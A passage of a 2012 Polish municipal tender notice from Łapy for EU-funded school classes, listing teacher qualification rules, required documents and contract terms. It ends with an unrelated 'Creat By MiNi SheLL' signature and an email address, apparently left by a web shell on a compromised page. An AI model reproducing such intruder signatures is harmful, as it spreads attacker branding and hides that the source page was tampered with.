2)	składając ofertę częściową na części zamówienia od nr 13 do 21  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku (specjalności) innym od nauczanego przedmiotu lub prowadzonymi zajęciami lub nieobejmującym zakresu określonego w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych nauczanego przedmiotu lub prowadzonych zajęć i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub 
- studia wyższe na kierunku pedagogika w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym,
lub
- zakład kształcenia nauczycieli w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym;

3)	składając ofertę częściową na części zamówienia od nr 22 do 30  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie w zakresie logopedii oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na dowolnym kierunku i studia podyplomowe w zakresie logopedii oraz posiada przygotowanie pedagogiczne,
lub
- studia pierwszego stopnia w zakresie logopedii oraz posiada przygotowanie pedagogiczne,
lub
- studia pierwszego stopnia na dowolnym kierunku (specjalności) i studia podyplomowe w zakresie logopedii oraz posiada przygotowanie pedagogiczne;
4)	składając ofertę częściową na części zamówienia od nr 31 do 36  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku (specjalności) innym od nauczanego przedmiotu lub prowadzonymi zajęciami lub nieobejmującym zakresu określonego w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych nauczanego przedmiotu lub prowadzonych zajęć i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia wyższe na kierunku pedagogika w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym oraz  posiada kwalifikacje w zakresie terapii pedagogicznej lub socjoterapii,
lub
- zakład kształcenia nauczycieli w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym oraz posiada kwalifikacje w zakresie terapii pedagogicznej lub socjoterapii;

5)	składając ofertę częściową na części zamówienia od nr 37 do 38  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie w zakresie wychowania fizycznego, gimnastyki korekcyjnej, rehabilitacji oraz posiada przygotowanie pedagogiczne 
lub
- studia magisterskie na dowolnym kierunku i studia podyplomowe w zakresie wychowania fizycznego, gimnastyki korekcyjnej, rehabilitacji oraz posiada przygotowanie pedagogiczne
lub
- studia pierwszego stopnia w zakresie wychowania fizycznego, gimnastyki korekcyjnej, rehabilitacji  oraz posiada przygotowanie pedagogiczne
lub
- studia pierwszego stopnia na dowolnym kierunku (specjalności) i studia podyplomowe w zakresie wychowania fizycznego, gimnastyki korekcyjnej, rehabilitacji oraz posiada przygotowanie pedagogiczne;

6)	składając ofertę częściową na części zamówienia od nr 39 do 42  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku (specjalności) innym od  nauczanego przedmiotu lub prowadzonymi zajęciami lub nieobejmującym zakresu określonego w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych nauczanego przedmiotu lub prowadzonych zajęć i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia wyższe na kierunku pedagogika w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym oraz posiada kwalifikacje w zakresie terapii pedagogicznej lub socjoterapii,
lub
- zakład kształcenia nauczycieli w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym oraz  posiada kwalifikacje w zakresie terapii pedagogicznej lub socjoterapii;
7)	składając ofertę częściową na części zamówienia od nr 43 do 59  należy wykazać dysponowanie osobą, która ukończyła:
- studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia magisterskie na kierunku (specjalności) innym od nauczanego przedmiotu lub prowadzonymi zajęciami lub nieobejmującym zakresu określonego w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych nauczanego przedmiotu lub prowadzonych zajęć i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć oraz posiada przygotowanie pedagogiczne,
lub
- studia wyższe na kierunku pedagogika w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym,
lub
- zakład kształcenia nauczycieli w specjalności przygotowującej do pracy z dziećmi w wieku przedszkolnym lub wczesnoszkolnym.


Zamawiający uzna warunek za spełniony przy zastrzeżeniu, że Wykonawca nie może wykazać dysponowania tą samą osobą posiadającą wymagane kwalifikacje do realizacji więcej niż 2 części zamówienia realizowanych w tej samej szkole podstawowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do
treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
a) termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
- zawieszenia wykonania usług przez Zamawiającego,
b) wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących
przypadkach:
- zmiana stawki urzędowej podatku VAT,
- rezygnacji z części usług, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji
przedmiotu umowy - o wartość niewykonanych usług,
c) inne
- zmiana osób, które będą uczestniczyć w wykonaniu zamówienia w przypadku wystąpienia zdarzeń losowych, uniemożliwiających prowadzenie zajęć, w szczególności w przypadku choroby osoby, która będzie prowadziła zajęcia, pod warunkiem zaakceptowania zmiany przez Zamawiającego. 
Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lapy.podlasie.pl, www.bip.lapy.podlasie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łapach
ul. Gen. Wł. Sikorskiego 24
18-100 Łapy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 08:30, miejsce: Urząd Miejski w Łapach
ul. Gen. Wł. Sikorskiego 24
18-100 Łapy
pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com